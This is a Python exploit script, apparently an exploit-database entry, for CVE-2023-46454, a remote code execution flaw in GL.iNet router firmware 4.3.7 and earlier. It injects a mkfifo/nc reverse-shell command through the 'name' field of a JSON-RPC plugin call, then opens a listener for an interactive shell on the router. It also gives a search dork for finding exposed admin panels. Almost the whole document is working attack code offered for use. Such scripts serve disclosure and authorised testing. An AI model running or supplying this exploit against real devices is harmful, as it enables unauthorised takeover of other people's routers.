GL.iNet AR300M v4.3.7 Remote Code Execution - CVE-2023-46454

1. #!/usr/bin/env python3
2.  
3. # Exploit Title: GL.iNet <= 4.3.7 Remote Code Execution via OpenVPN Client
4. # Google Dork: intitle:"GL.iNet Admin Panel"
5. # Date: XX/11/2023
6. # Exploit Author: Michele 'cyberaz0r' Di Bonaventura
7. # Vendor Homepage: https://www.gli-net.com
8. # Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/release4/openwrt-ar300m-4.3.7-0913-1694589403.tar
9. # Version: 4.3.7
10. # Tested on: GL.iNet AR300M
11. # CVE: CVE-2023-46454
12.  
13. import socket
14. import requests
15. import readline
16. from time import sleep
17. from random import randint
18. from sys import stdout, argv
19. from threading import Thread
20.  
21. requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
22.  
23. def trigger_revshell(url, auth_token, payload):
24.     sleep(0.25)
25.     data = {
26.         'jsonrpc': '2.0',
27.         'id': randint(1000, 9999),
28.         'method': 'call',
29.         'params': [
30.             auth_token,
31.             'plugins',
32.             'get_package_info',
33.             {'name': 'bas{}e-files'.format(payload)}
34.         ]
35.     }
36.     requests.post(url, json=data, verify=False)
37.  
38. def get_command_response(s):
39.     res = ''
40.     while True:
41.         try:
42.             resp = s.recv(1).decode('utf-8')
43.             res += resp
44.         except UnicodeDecodeError:
45.             pass
46.         except socket.timeout:
47.             break
48.     return res
49.  
50. def revshell_listen(revshell_ip, revshell_port):
51.     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
52.     s.settimeout(5)
53.  
54.     try:
55.         s.bind((revshell_ip, int(revshell_port)))
56.         s.listen(1)
57.     except Exception as e:
58.         print('[X] Exception "{}" encountered while binding reverse shell'.format(type(e).__name__))
59.         exit(1)
60.  
61.     try:
62.         clsock, claddr = s.accept()
63.         clsock.settimeout(2)
64.         if clsock:
65.             print('[+] Incoming reverse shell connection from {}:{}, enjoy ;)'.format(claddr[0], claddr[1]))
66.             res = ''
67.             while True:
68.                 command = input('$ ')
69.                 clsock.sendall('{}\n'.format(command).encode('utf-8'))
70.                 stdout.write(get_command_response(clsock))
71.  
72.     except socket.timeout:
73.         print('[-] No connection received in 5 seconds, probably server is not vulnerable...')
74.         s.close()
75.  
76.     except KeyboardInterrupt:
77.         print('\n[*] Closing connection')
78.         try:
79.             clsock.close()
80.         except socket.error:
81.             pass
82.         except NameError:
83.             pass
84.         s.close()
85.  
86. def main(base_url, auth_token, revshell_ip, revshell_port):
87.     print('[+] Started GL.iNet <= 4.3.7 RCE exploit')
88.  
89.     payload = '$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {} {} >/tmp/f)'.format(revshell_ip, revshell_port)
90.     print('[+] Reverse shell payload: "{}"'.format(payload))
91.  
92.     print('[*] Triggering reverse shell connection')
93.     Thread(target=trigger_revshell, args=(base_url+'/rpc', auth_token, payload)).start()
94.  
95.     print('[*] Starting reverse shell on {}:{}'.format(revshell_ip, revshell_port))
96.     revshell_listen(revshell_ip, revshell_port)
97.  
98.     print('[+] Done')
99.  
100. if __name__ == '__main__':
101.     if len(argv) < 5:
102.         print('Usage: {} <TARGET_URL> <AUTH_TOKEN> <REVSHELL_IP> <REVSHELL_PORT>'.format(argv[0]))
103.         exit(1)
104.  
105.     main(argv[1], argv[2], argv[3], argv[4])
106.